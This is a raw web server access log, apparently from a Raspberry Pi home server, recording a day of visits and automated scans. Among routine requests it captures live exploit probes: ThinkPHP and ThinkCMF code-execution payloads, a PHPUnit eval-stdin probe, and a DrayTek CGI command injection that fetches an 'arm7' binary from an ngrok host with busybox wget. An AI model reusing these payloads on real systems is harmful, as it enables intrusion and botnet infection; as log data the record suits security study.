Wed May 27 06:25:06 MDT 2020
 06:25:06 up 92 days, 10:53,  1 user,  load average: 0.71, 0.32, 0.29
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 92days  1:41m  4.32s /usr/bin/lxsession -s LXDE-pi -e LXDE
185.136.193.70 - - [27/May/2020:13:15:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
122.228.19.79 - - [27/May/2020:13:38:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
80.82.68.115 - - [27/May/2020:14:37:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
80.82.68.115 - - [27/May/2020:14:37:29 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
80.82.68.115 - - [27/May/2020:14:37:29 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
77.243.29.128 - - [27/May/2020:14:46:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
139.162.106.181 - - [27/May/2020:14:54:09 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)"
103.113.106.188 - - [27/May/2020:17:16:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.40.194.210 - - [27/May/2020:19:03:04 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
45.40.194.210 - - [27/May/2020:19:03:09 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
45.40.194.210 - - [27/May/2020:19:03:10 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
45.40.194.210 - - [27/May/2020:19:03:11 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
45.40.194.210 - - [27/May/2020:19:03:11 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
45.40.194.210 - - [27/May/2020:19:03:12 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
45.40.194.210 - - [27/May/2020:19:03:13 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
45.40.194.210 - - [27/May/2020:19:03:13 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
45.40.194.210 - - [27/May/2020:19:03:14 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
45.40.194.210 - - [27/May/2020:19:03:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
212.69.18.69 - - [27/May/2020:19:17:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
162.250.19.7 - - [27/May/2020:20:10:40 +0000] "GET /videos/knight2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "http://162.250.19.7/videos/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0"
162.250.19.7 - - [27/May/2020:20:11:00 +0000] "GET /videos/knight2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "http://162.250.19.7/videos/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0"
65.49.27.166 - - [27/May/2020:20:11:05 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.22.0"
162.155.147.38 - - [27/May/2020:20:13:14 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
162.155.147.38 - - [27/May/2020:20:13:15 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
162.155.147.38 - - [27/May/2020:20:13:15 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
162.155.147.38 - - [27/May/2020:20:13:15 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
162.155.147.38 - - [27/May/2020:20:13:15 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
162.155.147.38 - - [27/May/2020:20:13:15 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
162.155.147.38 - - [27/May/2020:20:13:16 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
162.155.147.38 - - [27/May/2020:20:13:16 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
162.155.147.38 - - [27/May/2020:20:13:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
162.155.147.38 - - [27/May/2020:20:13:17 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.250.19.7 - - [27/May/2020:20:13:29 +0000] "GET /videos/knight2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "http://162.250.19.7/videos/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0"
162.250.19.7 - - [27/May/2020:20:13:51 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
177.74.157.40 - - [27/May/2020:20:17:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
37.49.226.252 - - [27/May/2020:20:17:44 +0000] "GET / HTTP/1.1" 200 25000 "" ""
162.250.19.7 - - [27/May/2020:20:32:12 +0000] "GET /videos/knight-2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 200 306743544 "" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0"
80.67.220.3 - - [27/May/2020:22:06:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
35.233.105.134 - - [27/May/2020:22:20:14 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
195.54.160.130 - - [27/May/2020:22:55:40 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
200.2.162.34 - - [27/May/2020:23:01:16 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
195.54.160.130 - - [27/May/2020:23:12:33 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.130 - - [27/May/2020:23:13:05 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
111.254.17.3 - - [27/May/2020:23:20:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
195.54.160.130 - - [27/May/2020:23:29:21 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
182.160.111.26 - - [27/May/2020:23:53:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
194.182.72.52 - - [28/May/2020:00:20:37 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
196.53.114.200 - - [28/May/2020:00:55:44 +0000] "HEAD / HTTP/1.1" 200 0 "" ""
103.78.15.2 - - [28/May/2020:01:37:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
162.243.143.189 - - [28/May/2020:02:41:19 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
190.213.147.45 - - [28/May/2020:03:33:55 +0000] "GET / HTTP/1.0" 200 25000 "" ""
195.54.160.130 - - [28/May/2020:03:41:20 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
200.225.120.160 - - [28/May/2020:04:03:18 +0000] "GET / HTTP/1.0" 200 25000 "" ""
165.90.72.64 - - [28/May/2020:04:45:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
190.90.247.109 - - [28/May/2020:04:49:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
162.250.19.7 - - [28/May/2020:05:09:28 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36"
162.250.19.7 - - [28/May/2020:05:09:43 +0000] "GET /ac0xl/logs/2020.05.27 HTTP/1.1" 200 8854 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36"
194.44.32.2 - - [28/May/2020:05:26:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
195.54.160.130 - - [28/May/2020:05:55:49 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.115.174.119 - - [28/May/2020:05:55:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.54.160.130 - - [28/May/2020:05:57:10 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.130 - - [28/May/2020:05:57:11 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.130 - - [28/May/2020:06:00:14 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.130 - - [28/May/2020:06:42:02 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
200.93.21.242 - - [28/May/2020:07:50:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
220.133.225.70 - - [28/May/2020:07:59:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
220.133.225.70 - - [28/May/2020:07:59:34 +0000] "GET / HTTP/1.0" 200 25000 "" ""
195.54.160.130 - - [28/May/2020:08:22:28 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.130 - - [28/May/2020:08:41:52 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
69.171.192.58 - - [28/May/2020:11:05:31 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
69.171.192.58 - - [28/May/2020:11:05:31 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
118.70.190.137 - - [28/May/2020:11:26:14 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
118.70.190.137 - - [28/May/2020:11:26:14 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
118.70.190.137 - - [28/May/2020:11:26:15 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
118.70.190.137 - - [28/May/2020:11:26:16 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
138.19.251.214 - - [28/May/2020:11:27:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
Thu May 28 06:25:11 MDT 2020
 06:25:11 up  7:30,  1 user,  load average: 0.75, 0.32, 0.29
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               22:25    8:08m 25.74s  0.24s /usr/bin/lxsession -s LXDE-pi -e LXDE